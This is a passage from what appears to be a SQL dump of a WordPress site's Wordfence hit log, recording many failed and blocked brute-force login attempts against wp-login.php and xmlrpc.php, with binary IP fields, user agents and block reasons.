Network',NULL),(5584,0.000000,1628988712.282517,'\0\0\0\0\0\0\0\0\0\0����y',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(5585,0.000000,1628989753.914497,'\0\0\0\0\0\0\0\0\0\0��^��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5586,0.000000,1628990030.845149,'\0\0\0\0\0\0\0\0\0\0��E��p',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(5587,0.000000,1628991339.602989,'\0\0\0\0\0\0\0\0\0\0��j\\�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(5588,0.000000,1628992012.792896,'\0\0\0\0\0\0\0\0\0\0���A�O',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5589,0.000000,1628993962.699451,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(5590,0.000000,1628994300.074823,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5591,0.000000,1628995265.963783,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5592,0.000000,1628997859.913570,'\0\0\0\0\0\0\0\0\0\0��ghIo',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailValidUsername',NULL,NULL),(5593,0.000000,1628998433.736869,'\0\0\0\0\0\0\0\0\0\0��H��s',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5594,0.000000,1628999082.852550,'\0\0\0\0\0\0\0\0\0\0���>}�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailValidUsername',NULL,NULL),(5595,0.000000,1629000250.282257,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5596,0.000000,1629000306.169083,'\0\0\0\0\0\0\0\0\0\0��k��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5597,0.000000,1629001383.380047,'\0\0\0\0\0\0\0\0\0\0��U��E',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5598,0.000000,1629002076.889934,'\0\0\0\0\0\0\0\0\0\0����h�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5599,0.000000,1629002490.814506,'\0\0\0\0\0\0\0\0\0\0���cr5',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5600,0.000000,1629003589.236781,'\0\0\0\0\0\0\0\0\0\0��R�,�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','loginFailValidUsername',NULL,NULL),(5601,0.000000,1629003886.090757,'\0\0\0\0\0\0\0\0\0\0��#��w',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5602,0.000000,1629004698.830624,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5603,0.000000,1629005709.340883,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5604,0.000000,1629005810.466302,'\0\0\0\0\0\0\0\0\0\0��gZ��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5605,0.000000,1629006923.945286,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailValidUsername',NULL,NULL),(5606,0.000000,1629007561.013497,'\0\0\0\0\0\0\0\0\0\0���a�S',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5607,0.000000,1629008047.567314,'\0\0\0\0\0\0\0\0\0\0��3M�\"',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','loginFailValidUsername',NULL,NULL),(5608,0.000000,1629009175.176853,'\0\0\0\0\0\0\0\0\0\0��-(��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(5609,0.000000,1629009435.141717,'\0\0\0\0\0\0\0\0\0\0����B',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5610,0.000000,1629010313.802469,'\0\0\0\0\0\0\0\0\0\0����^�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','loginFailValidUsername',NULL,NULL),(5611,0.000000,1629011321.205208,'\0\0\0\0\0\0\0\0\0\0���\0�D',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5612,0.000000,1629011467.520955,'\0\0\0\0\0\0\0\0\0\0��@o~ ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5613,0.000000,1629013254.129278,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5614,0.000000,1629013750.669144,'\0\0\0\0\0\0\0\0\0\0���Vҳ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5615,0.000000,1629015175.666677,'\0\0\0\0\0\0\0\0\0\0���oXr',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5616,0.000000,1629017068.850398,'\0\0\0\0\0\0\0\0\0\0��ν�:',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5617,0.000000,1629017204.986924,'\0\0\0\0\0\0\0\0\0\0����l',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(5618,0.000000,1629019059.060326,'\0\0\0\0\0\0\0\0\0\0���]q�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5619,0.000000,1629021160.644205,'\0\0\0\0\0\0\0\0\0\0����I',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5620,0.000000,1629021786.109344,'\0\0\0\0\0\0\0\0\0\0��_��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','loginFailValidUsername',NULL,NULL),(5621,0.000000,1629022944.544759,'\0\0\0\0\0\0\0\0\0\0��/� ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5622,0.000000,1629023212.573664,'\0\0\0\0\0\0\0\0\0\0��T�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5623,0.000000,1629024101.910585,'\0\0\0\0\0\0\0\0\0\0��t˖G',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5624,0.000000,1629025270.762023,'\0\0\0\0\0\0\0\0\0\0��3KR',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5625,0.000000,1629026408.590076,'\0\0\0\0\0\0\0\0\0\0��-(��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','loginFailValidUsername',NULL,NULL),(5626,0.000000,1629027347.417055,'\0\0\0\0\0\0\0\0\0\0��.e_A',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5627,0.000000,1629027566.550985,'\0\0\0\0\0\0\0\0\0\0���;v�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','loginFailValidUsername',NULL,NULL),(5628,0.000000,1629028719.552188,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(5629,0.000000,1629029456.266325,'\0\0\0\0\0\0\0\0\0\0��@Z0�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5630,0.000000,1629031530.415901,'\0\0\0\0\0\0\0\0\0\0���VK�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5631,0.000000,1629033704.806248,'\0\0\0\0\0\0\0\0\0\0��2tb',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5632,0.000000,1629034035.737449,'\0\0\0\0\0\0\0\0\0\0����^�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','loginFailValidUsername',NULL,NULL),(5633,0.000000,1629035201.233042,'\0\0\0\0\0\0\0\0\0\0��]���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5634,0.000000,1629036379.577197,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5635,0.000000,1629038818.037571,'\0\0\0\0\0\0\0\0\0\0���>L',0,503,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5636,0.000000,1629049542.445195,'\0\0\0\0\0\0\0\0\0\0���>L',0,503,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5637,0.000000,1629054057.834141,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','loginFailValidUsername',NULL,NULL),(5638,1629055223.554542,1629055223.268100,'\0\0\0\0\0\0\0\0\0\0��g�i�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(5639,0.000000,1629057188.372650,'\0\0\0\0\0\0\0\0\0\0��#�,&',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(5640,0.000000,1629060168.939292,'\0\0\0\0\0\0\0\0\0\0���>L',0,200,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(5641,0.000000,1629060318.060556,'\0\0\0\0\0\0\0\0\0\0���]�_',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','loginFailValidUsername',NULL,NULL),(5642,0.000000,1629069711.184538,'\0\0\0\0\0\0\0\0\0\0���aD�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5643,0.000000,1629070856.992586,'\0\0\0\0\0\0\0\0\0\0���>L',0,503,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5644,0.000000,1629072337.918812,'\0\0\0\0\0\0\0\0\0\0����d�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224','loginFailValidUsername',NULL,NULL),(5645,0.000000,1629072858.965439,'\0\0\0\0\0\0\0\0\0\0����gI',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','loginFailValidUsername',NULL,NULL),(5646,0.000000,1629076001.535712,'\0\0\0\0\0\0\0\0\0\0���aD�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5647,0.000000,1629077532.557301,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5648,0.000000,1629079147.720849,'\0\0\0\0\0\0\0\0\0\0��j4��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5649,0.000000,1629081471.235589,'\0\0\0\0\0\0\0\0\0\0���>L',0,503,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5650,0.000000,1629082298.316518,'\0\0\0\0\0\0\0\0\0\0����}',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','loginFailValidUsername',NULL,NULL),(5651,0.000000,1629085457.110799,'\0\0\0\0\0\0\0\0\0\0��ν�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','loginFailValidUsername',NULL,NULL),(5652,0.000000,1629087112.760875,'\0\0\0\0\0\0\0\0\0\0���^�n',0,503,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5653,1629087126.314777,1629087125.975900,'\0\0\0\0\0\0\0\0\0\0���^�n',0,503,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly94bWxycGMucGhw\"}'),(5654,0.000000,1629087490.915296,'\0\0\0\0\0\0\0\0\0\0���^�R',0,200,0,1,0,'https://www.equalitywalk.org.uk//wp-login.php','https://www.equalitywalk.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(5655,0.000000,1629087495.304329,'\0\0\0\0\0\0\0\0\0\0���^�R',0,200,0,1,0,'https://www.equalitywalk.org.uk//wp-login.php','https://www.equalitywalk.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(5656,0.000000,1629087496.237510,'\0\0\0\0\0\0\0\0\0\0���^�R',0,200,0,1,0,'https://www.equalitywalk.org.uk//wp-login.php','https://www.equalitywalk.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(5657,0.000000,1629088618.445856,'\0\0\0\0\0\0\0\0\0\0��e ��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginFailValidUsername',NULL,NULL),(5658,0.000000,1629091716.758634,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5659,0.000000,1629092299.420317,'\0\0\0\0\0\0\0\0\0\0���>L',0,200,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(5660,0.000000,1629094706.238288,'\0\0\0\0\0\0\0\0\0\0��t˖G',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','loginFailValidUsername',NULL,NULL),(5661,0.000000,1629097702.654271,'\0\0\0\0\0\0\0\0\0\0���a�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(5662,0.000000,1629100723.754297,'\0\0\0\0\0\0\0\0\0\0���B��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(5663,0.000000,1629102966.354195,'\0\0\0\0\0\0\0\0\0\0���>L',0,200,0,0,0,'https://www.equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(5664,0.000000,1629103754.595710,'\0\0\0\0\0\0\0\0\0\0��]���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(5665,0.000000,1629106793.999086,'\0\0\0\0\0\0\0\0\0\0���Vҳ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(5666,0.000000,1629109822.379539,'\0\0\0\0\0\0\0\0\0\0���#�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(5667,0.000000,1629112859.068722,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5668,0.000000,1629114849.663360,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.equalitywalk.org.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(5669,0.000000,1629115911.797252,'\0\0\0\0\0\0\0\0\0\0���q�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5670,1629118163.583525,1629118163.028500,'\0\0\0\0\0\0\0\0\0\0����Ѝ',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','blocked:waf','Known malicious 